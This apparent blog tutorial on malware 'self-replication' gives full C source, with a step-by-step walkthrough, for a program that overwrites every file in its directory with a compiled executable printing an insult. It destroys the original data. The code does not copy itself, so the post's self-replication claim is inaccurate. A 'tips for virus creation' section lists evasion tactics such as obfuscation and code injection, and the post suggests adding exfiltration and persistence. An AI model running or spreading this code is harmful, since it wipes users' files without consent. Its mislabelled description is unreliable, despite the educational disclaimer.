Computer viruses are notoriously frustrating and challenging to eliminate, primarily due to their ability to replicate themselves within systems. This self-replicating nature makes them particularly resilient, complicating the cleanup process and increasing the potential for widespread damage.
In this article, I will discuss the self-replication ability of malicious software, commonly known as malware. I will provide a brief overview of self-replication and then present examples of self-replicating code implemented in the C programming language.
Self-Replication
Self-replication is a key trait of many types of malware, enabling them to copy themselves without human intervention.
Malware often exploits software vulnerabilities to install copies on the same or other devices. This can happen via email attachments, infected downloads, or network shares.
Once a system is compromised, the malware can spread to other systems, causing widespread outbreaks.
The self-replication process can range from simple scripts modifying files to more advanced methods, like altering executables to run alongside the original program.
Developing Self-Replicating Program Using C
The following code example demonstrates how to iterate through files in a directory, generate new C programs with predefined content, and compile them into executables and remove original content.
Cautious: Operate within a folder that does not contain important files. The code has limited access to other directories; however, it can modify files within the same directory with the software.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <sys/stat.h>
#include <unistd.h>
#define BUFFER_SIZE 1024
void change_extension_and_copy(const char *filename, const char *content) {
char new_filename[BUFFER_SIZE];
snprintf(new_filename, sizeof(new_filename), "%s.c", filename);
FILE *new_file = fopen(new_filename, "w");
fprintf(new_file, "%s", content);
fclose(new_file);
char command[BUFFER_SIZE];
#ifdef _WIN32
snprintf(command, sizeof(command), "gcc -o %s.exe %s", filename, new_filename);
#else
snprintf(command, sizeof(command), "gcc -o %s %s", filename, new_filename);
#endif
system(command);
remove(new_filename);
}
int main() {
DIR *dir;
struct dirent *entry;
const char *content = "#include <stdio.h>\n"
"int main() {\n"
" printf(\"You are stupid!\\n\");\n"
" return 0;\n"
"}\n";
dir = opendir(".");
while ((entry = readdir(dir)) != NULL) {
if (strcmp(entry->d_name, ".") == 0 || strcmp(entry->d_name, "..") == 0) {
continue;
}
change_extension_and_copy(entry->d_name, content);
}
closedir(dir);
return EXIT_SUCCESS;
}
This code collects all files in the current directory, replaces their content with a simple C program, compiles them into executables, and removes the temporary .c files.
Now, let us take a closer look at the intricacies of malicious software.
Examining Behaviour of Code Step by Step
Let's begin by examining code step by step to understand how it manifests itself. To start, this approach will allow us to dissect its behavior and functionality.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <sys/stat.h>
#include <unistd.h>
To compile and run the provided C code, use a C compiler like GCC, ensuring you have the necessary standard libraries (, , , , , and ) available in your development environment.
#define BUFFER_SIZE 1024
The line #define BUFFER_SIZE 1024 defines a constant named BUFFER_SIZE with a value of 1024, which can be used throughout the code to specify the size of buffers for reading data or storing strings, ensuring consistency and easier maintenance.
1.1 Helper Function
void change_extension_and_copy(const char *filename, const char *content) {
char new_filename[BUFFER_SIZE];
snprintf(new_filename, sizeof(new_filename), "%s.c", filename);
FILE *new_file = fopen(new_filename, "w");
fprintf(new_file, "%s", content);
fclose(new_file);
char command[BUFFER_SIZE];
#ifdef _WIN32
snprintf(command, sizeof(command), "gcc -o %s.exe %s", filename, new_filename);
#else
snprintf(command, sizeof(command), "gcc -o %s %s", filename, new_filename);
#endif
system(command);
remove(new_filename);
}
The function change_extension_and_copy performs the following tasks:
Create a New Filename: It takes an existing filename and appends a .c extension to it, storing the result in new_filename.
Write Content to a New File: It opens a new file with the name new_filename in write mode and writes the provided content (which is expected to be C code) into this file. After writing, it closes the file.
Compile the New C File: It constructs a command to compile the newly created C file using the GCC compiler. The output executable is named after the original filename, with a .exe extension on Windows systems.
Execute the Compilation Command: It uses the system() function to execute the compilation command in the shell.
Clean Up: Finally, it removes the temporary C file (new_filename) after compilation, leaving only the compiled executable.
1.2 Main Function
int main() {
DIR *dir;
struct dirent *entry;
const char *content = "#include <stdio.h>\n"
"int main() {\n"
" printf(\"You are stupid!\\n\");\n"
" return 0;\n"
"}\n";
dir = opendir(".");
while ((entry = readdir(dir)) != NULL) {
if (strcmp(entry->d_name, ".") == 0 || strcmp(entry->d_name, "..") == 0) {
continue;
}
change_extension_and_copy(entry->d_name, content);
}
closedir(dir);
return EXIT_SUCCESS;
}
The main function in this code performs the following tasks:
Directory Initialization: It declares a pointer dir to represent a directory stream and a pointer entry to hold directory entries. It then defines a string content that contains a simple C program that prints "You are stupid!" to the console.
Open Current Directory: The function uses opendir(".") to open the current directory (denoted by ".").
-
Read Directory Entries: It enters a loop that reads each entry in the directory using readdir(dir). For each entry:
- It checks if the entry is the current directory (".") or the parent directory (".."). If so, it skips to the next iteration.
Process Each File: For all other entries, it calls the change_extension_and_copy function, passing the name of the entry and the predefined content. This function creates a new C file, writes the content to it, compiles it, and removes the source file.
Close Directory: After processing all entries, it closes the directory stream with closedir(dir).
Exit: Finally, it returns EXIT_SUCCESS, indicating that the program has completed successfully.
How Self-Replicating Programs Evolve into Complex and Harmful Malware
We can observe how this code could be adapted to illustrate the functionality of more advanced self-replicating programs or even demonstrate potential malicious effects.
Real-life viruses often evolve to incorporate more harmful behaviours, such as:
Data Exfiltration: Embedding functionality to read sensitive files and transmit their contents to an external server.
Persistence: Installing the program as a background process or startup service to ensure it remains active after a reboot.
Network Propagation: Adding mechanisms to spread across systems via shared network drives or email attachments.
Polymorphism: Altering the program's code on each replication to evade detection by antivirus software.
However, our objective is not to create a fully functional virus but rather to study the self-replication mechanisms that viruses employ.
Therefore, we will focus solely on the replication process itself, intentionally omitting any harmful features typically associated with viruses.
Some Tips for Virus Creation
Many virus writers use a variety of techniques to make their code difficult to detect and understand. For instance, some of these techniques include:
Obfuscation: They often encrypt portions of the code or add unrelated and unnecessary code fragments to confuse anyone who might be trying to analyze it. By doing so, they make the virus more difficult to reverse-engineer.
Lack of Comments: Virus creators intentionally avoid adding comments in their code, making it harder for others to understand its function and purpose. This lack of documentation is a deliberate choice to prevent easy identification of malicious behavior.
Unusual Naming Conventions: They commonly use strange and random variable names, function names, or class names, further obscuring the program’s purpose. These arbitrary names make the code harder to read and analyse.
Code Injection: A common tactic is to inject malicious code into legitimate software applications. As a result, this allows the virus to remain hidden within trusted programs, making it harder for users or security software to detect. Once injected, it can disrupt or manipulate the functioning of the legitimate software, thereby allowing the virus to carry out its harmful actions unnoticed.
Simple Yet Effective
Self-replicating programs may seem simple at first glance, but they can become dangerous under certain circumstances.
For example, a harmless script that replaces files and compiles them into executables may pose little risk in a controlled directory, but the potential for harm increases when modified to affect multiple directories or include malicious behaviours.
Though this simple self-replication example is mostly harmless, it can pose risks in certain situations; for example, it can overwrite critical files.
The content for injection can be altered to include other types of unwanted malicious code instead of just displaying annoying text messages.
Conclusion
Understanding how hackers design and conceal malicious software is crucial for strengthening defenses and protecting systems.
Moreover, by learning the techniques they use to obfuscate code and evade detection, we can better defend against such threats.
However, it is important to remember that engaging with or deploying malicious software in any environment without proper authorization is illegal and unethical.
This software is strictly for educational and research purposes only. Any misuse of this program in malicious activities is unethical and may result in legal consequences. The author is not responsible for any damage caused by the use or misuse of this software.
Top comments (0)